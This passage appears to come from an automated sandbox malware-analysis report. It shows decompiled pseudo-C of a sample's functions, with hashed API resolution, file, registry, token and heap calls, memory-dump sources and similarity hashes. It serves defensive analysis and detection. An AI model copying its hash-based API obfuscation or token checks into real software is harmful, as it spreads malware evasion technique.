						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x73335b1f
0x73335b26
0x73335b75
0x73335b7e
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x73335bff
0x73335c06
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73335BAA

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 502a2de82141f52eb174f1501d7d707389c48681dc35b2a7429d07e79ab13c4a
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: 7C01F9B0780307BBFB3216108C81F3B7E6DDF83245F84C96AB986620C5DF7194188131

Uniqueness

Uniqueness Score: -1.00%

Function 73335B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E73335B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7332C328(_t23);
				if(E7332C33C(_t23) != 0) {
					_t31[2] = E7333352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E73332F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E733335D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x73335b6d
0x73335b71
0x73335b75
0x73335b7e
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x73335bff
0x73335c06
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73335BAA

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: c4391eade8acf8dd16efd9598ee94662af78a2efb3fade4db66e01ba17e43fcf
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 34F0F4B0780307BBFB3116108C81F3BBE6EEF83245F84896AB946620C1DF6294188271

Uniqueness

Uniqueness Score: -1.00%

Function 73335D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E73335D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E7332C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E73332F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x73335d80
0x73335d81
0x73335d83
0x73335d89
0x73335d8b
0x73335d8f
0x73335d8f
0x73335d93
0x73335d9f
0x73335dd3
0x73335dd3
0x00000000
0x73335da1
0x73335da6
0x73335da7
0x73335dbb
0x73335dcc
0x73335dbd
0x73335dc8
0x73335dc8
0x73335dd1
0x73335dd9
0x73335ddb
0x73335dde
0x73335de3
0x73335de3
0x73335de7
0x73335dec
0x00000000
0x00000000
0x00000000
0x73335dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,73335CB4,?,?), ref: 73335DC8

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: a015552dbbcb52bede7d5dbcf1513ceb6418778e3894a70d4d823699da9aec02
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: D3F02D71A057516AF3715A389C44BAB7BF9DFD3710F648B2FF581E7194E76094408390

Uniqueness

Uniqueness Score: -1.00%

Function 733355B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733355B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E73332F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E7332E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x733355c2
0x733355c4
0x733355cb
0x733355cd
0x733355d1
0x733355d3
0x733355d6
0x733355d9
0x733355d9
0x733355f3
0x00000000
0x00000000
0x73335604
0x73335608
0x00000000
0x00000000
0x73335616
0x73335619
0x7333561e
0x73335623
0x73335623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 73335604

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: cbd166a00b2e769288256e1c826c7c341859ef14bc70882c4ba2cf772c1481a2
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: F9F0AFB56003096FF7359E1ADC44EB7BBFDEBC1B14F04C51EB4D643240DA30A8118AA0

Uniqueness

Uniqueness Score: -1.00%

Function 733310CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E733310CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E73332F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x733310da
0x733310dc
0x733310ea
0x733310ee
0x73331137
0x00000000
0x73331137
0x733310f3
0x733310f4
0x733310f6
0x733310fb
0x00000000
0x73331114
0x73331118
0x73331125
0x73331129
0x00000000
0x00000000
0x00000000
0x73331132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 73331125

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: b2cbbbb2a775cd59ad8e964a3f7253195babc8150803ad3191cc39c8f405aff0
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: FDF0CDB5F043476BFB24A5288D04FBF23ED5BC2600F80CC3CB541DA188EA78C8058721

Uniqueness

Uniqueness Score: -1.00%

Function 73333564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E73333564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x7333d228 == 0xcd845700) {
					_t8 = E73332F8C(0xa5eabdf8, 0xd926c223);
					 *0x7333d22c = E73332F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x7333d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x7333d228 = 0;
					}
				}
				_t3 = E73332F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x7333d228);
					asm("int3");
					return _t3;
				}
			}

0x7333356c
0x73333574
0x733335a7
0x733335b8
0x733335c3
0x733335ce
0x733335d0
0x733335d0
0x733335c3
0x73333580
0x73333587
0x73333597
0x73333589
0x73333589
0x7333358a
0x7333358c
0x7333358e
0x7333358f
0x7333358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7332DEB9,?,?), ref: 733335CE

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d642d55a0e6f7b48f9732712826028921463e2b9c79d395822b5f2becaa0ba6a
Instruction ID: 441fd227ebc212b5e6e0e25232e9abfb40f4c814ce3679bf878979656fffa3e9
Opcode Fuzzy Hash: d642d55a0e6f7b48f9732712826028921463e2b9c79d395822b5f2becaa0ba6a
Instruction Fuzzy Hash: 1AF0AE73608215BEF2721B76AC04F16BEDCEFC6637FD4C42CB945EA080D6194440D621

Uniqueness

Uniqueness Score: -1.00%

Function 025D1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 025D1EA8

Memory Dump Source

Source File: 00000002.00000002.616008075.00000000025D0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 940cf3a7390bb60256a087320a7dd2d244c4d054baae94ff635fb2a747557948
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: D041D2B5E0461A8FDB04DFA8C4906AEBBF1FF48714F15852EE448AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 73329144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E73329144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E73332F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E7332F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E7332F620( &_v472, 0);
				_v528 = 0;
				E7332F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v528, E7332F568( &_v528) + 0x10);
				E7332F558( &_v532, E7332F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v536, E7332F568( &_v536) + 0x10);
				E7332F558( &_v540, E7332F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v544, E7332F568( &_v544) + 0x10);
				E7332F558( &_v548, E7332F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v552, E7332F568( &_v552) + 0x10);
				E7332F558( &_v556, E7332F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v560, E7332F568( &_v560) + 0x10);
				E7332F558( &_v564, E7332F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E7332F8C4( &_v568, E7332F568( &_v568) + 0x10);
				E7332F558( &_v572, E7332F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E7333413C(0xa5eabdf8, _t953);
				E7332F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E7332F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E7332F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E7332F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E7332F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E7332F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E7332ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E7332B338( &_v308, _t951, __eflags, _t889, _t931);
					E7332F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v516, E7332F568( &_v516) + 0x10);
					E7332F558( &_v520, E7332F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v524, E7332F568( &_v524) + 0x10);
					E7332F558( &_v528, E7332F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v532, E7332F568( &_v532) + 0x10);
					E7332F558( &_v536, E7332F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E7332BAB8( &_v340, __eflags);
					E7332F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E7332F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E7332F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E7332F620( &_v396, 0);
					E7332F620( &_v416, 0);
					_push(0);
					_push( *0x7333b7c4);
					E733320A4(__eflags,  &_v100);
					E7332F75C( &_v416, __eflags);
					E7332E054( &_v100);
					E7332F8C4( &_v436, E7332F744( &_v420,  &_v100));
					_t437 = E7332F558( &_v424, 0);
					E73327970(_t951, _t437, E7332F558( &_v444, 0), _v112);
					_t442 = E7332F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E7332B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E7332B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E7332F6F0( &_v380);
						E7332F6F0( &_v364);
						E7332F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E733335D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E7332CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E7332B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E7332F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E7332F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E73333C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E7332F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v564, E7332F568( &_v564) + 0x10);
					E7332F558( &_v568, E7332F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v572, E7332F568( &_v572) + 0x10);
					E7332F558( &_v576, E7332F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v580, E7332F568( &_v580) + 0x10);
					E7332F558( &_v584, E7332F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v588, E7332F568( &_v588) + 0x10);
					E7332F558( &_v592, E7332F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v596, E7332F568( &_v596) + 0x10);
					E7332F558( &_v600, E7332F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v604, E7332F568( &_v604) + 0x10);
					E7332F558( &_v608, E7332F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v612, E7332F568( &_v612) + 0x10);
					E7332F558( &_v616, E7332F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E7332F8C4( &_v620, E7332F568( &_v620) + 0x10);
					E7332F558( &_v624, E7332F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E7333413C(0xa5eabdf8, _t857);
					E7332F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E7332F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
